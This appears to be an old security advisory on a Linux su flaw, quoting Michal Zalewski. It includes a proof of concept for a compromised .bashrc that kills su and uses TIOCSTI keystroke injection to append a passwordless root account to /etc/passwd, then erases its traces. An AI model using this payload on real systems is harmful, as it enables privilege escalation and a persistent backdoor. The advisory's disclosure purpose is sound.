COMMAND

    su

SYSTEMS AFFECTED

    Linux

PROBLEM

    Michal Zalewski posted following.  There's a problem with Linux su
    command.   If  non-root  account  will  be  compromised,  eg. with
    lynx/ncftp  bug,  and  .bashrc  on  this  non-root account will be
    altered to something like that:

    cat >/tmp/a.c <<X
    #include <sys/ioctl.h>
    main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0,
    P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);}
    X
    gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear

    During  next  su  session,  "echo  '...'  >>/etc/passwd"  will  be
    executed at root account.  In general, problem lies in ability  to
    killing su itself by unprivledged process - it will still be  able
    to control  terminal i/o,  because su,  when killed  with SIGKILL,
    performs no  any tty  hangup/reset.   So we  may parse anything to
    privledged shell,  or do  anything else  with terminal.   So there
    are 3  bugs:   unprivledged process  may kill  'su'; 'su'  doesn't
    perform any tty checks; bash also is careless.

SOLUTION

    Replace Linux su with another one.  This should be fixed soon.